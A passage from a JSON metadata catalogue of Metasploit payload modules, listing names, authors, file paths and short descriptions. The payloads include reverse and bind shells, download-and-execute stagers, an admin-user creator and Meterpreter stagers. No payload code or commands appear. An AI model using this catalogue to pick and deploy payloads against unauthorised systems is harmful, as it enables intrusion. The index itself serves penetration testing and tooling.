"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_ssl_double_telnet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_stub": {
"name": "Unix Command Shell, Reverse TCP (stub)",
"full_name": "payload/cmd/unix/reverse_stub",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Creates an interactive shell through an inbound connection (stub only, no payload)",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-28 16:21:37 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_stub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/unix/reverse_zsh": {
"name": "Unix Command Shell, Reverse TCP (via Zsh)",
"full_name": "payload/cmd/unix/reverse_zsh",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Doug Prostko <dougtko@gmail.com>",
"Wang Yihang <wangyihanger@gmail.com>"
],
"description": "Connect back and create a command shell via Zsh. Note: Although Zsh is often\n available, please be aware it isn't usually installed by default.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-15 19:42:39 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_zsh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/adduser": {
"name": "Windows Execute net user /ADD CMD",
"full_name": "payload/cmd/windows/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>",
"scriptjunkie",
"Chris John Riley"
],
"description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/adduser.rb",
"is_install_path": true,
"ref_name": "cmd/windows/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_cmd/windows/bind_lua": {
"name": "Windows Command Shell, Bind TCP (via Lua)",
"full_name": "payload/cmd/windows/bind_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Listen for a connection and spawn a command shell via Lua",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/bind_perl": {
"name": "Windows Command Shell, Bind TCP (via Perl)",
"full_name": "payload/cmd/windows/bind_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent)",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_perl.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/bind_perl_ipv6": {
"name": "Windows Command Shell, Bind TCP (via perl) IPv6",
"full_name": "payload/cmd/windows/bind_perl_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent)",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_perl_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/bind_ruby": {
"name": "Windows Command Shell, Bind TCP (via Ruby)",
"full_name": "payload/cmd/windows/bind_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/download_eval_vbs": {
"name": "Windows Executable Download and Evaluate VBS",
"full_name": "payload/cmd/windows/download_eval_vbs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie"
],
"description": "Downloads a file from an HTTP(S) URL and executes it as a vbs script.\n Use it to stage a vbs encoded payload from a short command line.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb",
"is_install_path": true,
"ref_name": "cmd/windows/download_eval_vbs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/download_exec_vbs": {
"name": "Windows Executable Download and Execute (via .vbs)",
"full_name": "payload/cmd/windows/download_exec_vbs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie"
],
"description": "Download an EXE from an HTTP(S) URL and execute it",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb",
"is_install_path": true,
"ref_name": "cmd/windows/download_exec_vbs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/generic": {
"name": "Windows Command, Generic Command Execution",
"full_name": "payload/cmd/windows/generic",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Executes the supplied command",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/generic.rb",
"is_install_path": true,
"ref_name": "cmd/windows/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/powershell_bind_tcp": {
"name": "Windows Interactive Powershell Session, Bind TCP",
"full_name": "payload/cmd/windows/powershell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy"
],
"description": "Interacts with a powershell session on an established socket connection",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "cmd/windows/powershell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/powershell_reverse_tcp": {
"name": "Windows Interactive Powershell Session, Reverse TCP",
"full_name": "payload/cmd/windows/powershell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy"
],
"description": "Interacts with a powershell session on an established socket connection",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "cmd/windows/powershell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_lua": {
"name": "Windows Command Shell, Reverse TCP (via Lua)",
"full_name": "payload/cmd/windows/reverse_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Creates an interactive shell via Lua",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_perl": {
"name": "Windows Command, Double Reverse TCP Connection (via Perl)",
"full_name": "payload/cmd/windows/reverse_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"cazz <bmc@shmoo.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "Creates an interactive shell via perl",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_powershell": {
"name": "Windows Command Shell, Reverse TCP (via Powershell)",
"full_name": "payload/cmd/windows/reverse_powershell",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Dave Kennedy",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Connect back and create a command shell via Powershell",
"references": [
"URL-https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_powershell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_ruby": {
"name": "Windows Command Shell, Reverse TCP (via Ruby)",
"full_name": "payload/cmd/windows/reverse_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Connect back and create a command shell via Ruby",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_firefox/exec": {
"name": "Firefox XPCOM Execute Command",
"full_name": "payload/firefox/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module runs a shell command on the target OS without touching the disk.\n On Windows, this command will flash the command prompt momentarily.\n This can be avoided by setting WSCRIPT to true, which drops a jscript\n \"launcher\" to disk that hides the prompt.",
"references": [
],
"platform": "Firefox",
"arch": "firefox",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/firefox/exec.rb",
"is_install_path": true,
"ref_name": "firefox/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_firefox/shell_bind_tcp": {
"name": "Command Shell, Bind TCP (via Firefox XPCOM script)",
"full_name": "payload/firefox/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API",
"references": [
],
"platform": "Firefox",
"arch": "firefox",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "firefox/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_firefox/shell_reverse_tcp": {
"name": "Command Shell, Reverse TCP (via Firefox XPCOM script)",
"full_name": "payload/firefox/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API",
"references": [
],
"platform": "Firefox",
"arch": "firefox",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "firefox/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/custom": {
"name": "Custom Payload",
"full_name": "payload/generic/custom",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie <scriptjunkie@scriptjunkie.us>"
],
"description": "Use custom string or file as payload. Set either PAYLOADFILE or\n PAYLOADSTR.",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/custom.rb",
"is_install_path": true,
"ref_name": "generic/custom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/debug_trap": {
"name": "Generic x86 Debug Trap",
"full_name": "payload/generic/debug_trap",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"robert <robertmetasploit@gmail.com>"
],
"description": "Generate a debug trap in the target process",
"references": [
],
"platform": "BSD,BSDi,Linux,OSX,Solaris,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/debug_trap.rb",
"is_install_path": true,
"ref_name": "generic/debug_trap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/shell_bind_tcp": {
"name": "Generic Command Shell, Bind TCP Inline",
"full_name": "payload/generic/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "generic/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/shell_reverse_tcp": {
"name": "Generic Command Shell, Reverse TCP Inline",
"full_name": "payload/generic/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "generic/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/tight_loop": {
"name": "Generic x86 Tight Loop",
"full_name": "payload/generic/tight_loop",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Generate a tight loop in the target process",
"references": [
],
"platform": "BSD,BSDi,Linux,OSX,Solaris,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/tight_loop.rb",
"is_install_path": true,
"ref_name": "generic/tight_loop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/jsp_shell_bind_tcp": {
"name": "Java JSP Command Shell, Bind TCP Inline",
"full_name": "payload/java/jsp_shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux,OSX,Solaris,Unix,Windows",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/jsp_shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/jsp_shell_reverse_tcp": {
"name": "Java JSP Command Shell, Reverse TCP Inline",
"full_name": "payload/java/jsp_shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux,OSX,Solaris,Unix,Windows",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/jsp_shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/bind_tcp": {
"name": "Java Meterpreter, Java Bind TCP Stager",
"full_name": "payload/java/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in Java. Listen for a connection",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/reverse_http": {
"name": "Java Meterpreter, Java Reverse HTTP Stager",
"full_name": "payload/java/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Run a meterpreter server in Java. Tunnel communication over HTTP",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_http.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/reverse_https": {
"name": "Java Meterpreter, Java Reverse HTTPS Stager",
"full_name": "payload/java/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Run a meterpreter server in Java. Tunnel communication over HTTPS",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_https.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/reverse_tcp": {
"name": "Java Meterpreter, Java Reverse TCP Stager",
"full_name": "payload/java/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in Java. Connect back stager",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/shell/bind_tcp": {
"name": "Command Shell, Java Bind TCP Stager",
"full_name": "payload/java/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/shell/reverse_tcp": {
"name": "Command Shell, Java Reverse TCP Stager",
"full_name": "payload/java/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/shell_reverse_tcp": {
"name": "Java Command Shell, Reverse TCP Inline",
"full_name": "payload/java/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Connect back to the attacker and spawn a command shell",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/java/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/aarch64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-29 10:09:38 +0000",
"path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/aarch64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/aarch64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/aarch64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/shell/reverse_tcp": {
"name": "Linux dup2 Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/aarch64/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "dup2 socket in x12, then execve. Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-29 10:09:38 +0000",
"path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/aarch64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to the attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 14:42:30 +0000",
"path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/armbe/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/armbe/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
